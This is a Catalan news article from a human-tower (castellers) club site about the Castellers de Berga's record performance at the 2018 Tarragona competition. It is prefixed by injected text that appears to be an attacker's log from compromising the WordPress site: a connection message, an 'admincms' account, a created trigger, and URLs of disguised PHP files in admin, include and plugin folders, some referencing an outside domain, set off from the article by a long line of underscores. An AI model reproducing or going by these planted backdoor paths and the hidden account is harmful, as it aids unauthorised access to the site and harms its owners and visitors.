Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?private https://castellersdeberga.cat/wp-admin/async-upload-meta-private-private-meta-ajax-ajax-response-ajax-response-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/ajax-actions-wp-cron-stream-meta-meta.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/load-styles-ajax-wp-cron-stream-wp.php https://castellersdeberga.cat/wp-content/plugins/google-calendar-events/google-calendar-events-ajax-private-stream-wp-core.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/index-ajax-response-meta-private-stream-wp-meta.php https://castellersdeberga.cat/wp-includes/ms-deprecated-stream-private-meta-stream.php https://castellersdeberga.cat/wp-includes/blocks/file-ajax-wp-stream.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Els Castellers de Berga ens superem a Tarragona
 

Els Castellers de Berga ens superem a Tarragona


Els Castellers de Berga ens superem a TarragonaEls berguedans vam tornar a signar la nostra millor actuació de la història descarregant el 7 de 7,el 4 de 8 i el 2 de 7. Gairebé 250 camises i samarretes van fer pinya amb els Castellers de Berga en una tarda per recordar, a la Tarraco Arena Plaça.
Dissabte 6 d’octubre de 2018, participaven a aquesta jornada del concurs 19 colles castelleres: les classificades entre la posició 13 i la 30 durant l’últim any. Amb l’actuació a la TAP, els de Berga ens vam classificar 10ens amb la mateixa puntuació que els 9ens. Avui es disputa la jornada de diumenge amb les 12 colles capdavanteres, també a la TAP. Cal destacar que, de les 31 colles que participen al concurs a Tarragona, els Castellers de Berga som la colla de més recent creació.
Vam començar la nostra participació al concurs descarregant el 7 de 7, un castell ample amb molts castellers al tronc, que ja havíem descarregat altres vegades. En segona ronda, arribava el plat fort: el 4 de 8. El castell no presentava bones mides i es va decidir demuntar-lo. A la tercera ronda, sí: 4 de 8 descarregat, el segon “carro gros” de la nostra història descarregat. El primer 4 de 8 el vam carregar a la mateixa Tarraco Arena Plaça, al concurs de fa 2 anys. En quarta roda, intent desmuntat del 2 de 7. Ï, en cinquena roda, vam descarregar el quart 2 de 7 d’aquesta temporada.
Els Moixiganguers d’Igualada, empatats a punts amb els Xiquets de Reus, van quedar en primera posició en el concurs de dissabte fent la seva millor actuació de la història i descarregant per primera vegada el 3 de 9 amb folre. També destaca el primer 2 de 7 descarregat per la Colla Jove de Barcelona.
A falta de la jornada de diumenge, els Castellers de Berga som els 10ens classificats i, previsiblement, ens classificarem en la posició 22 del concurs. El 7 de 7, 4 de 8 i 2 de 7 descarregats a Tarragona suposen els tres millors castells que hem descarregat mai en una sola actuació. Un passet més endavant. I després de 6 anys, no és gens fàcil mantenir el nivell i créixer continuadament.
Els Castellers de Berga encarem un mes d’octubre intens: el 13 d’octubre actuem a Sabadell, el 20 actuació a Berga i final de temporada a Mallorca el cap de setmana del 27 i 28 d’octubre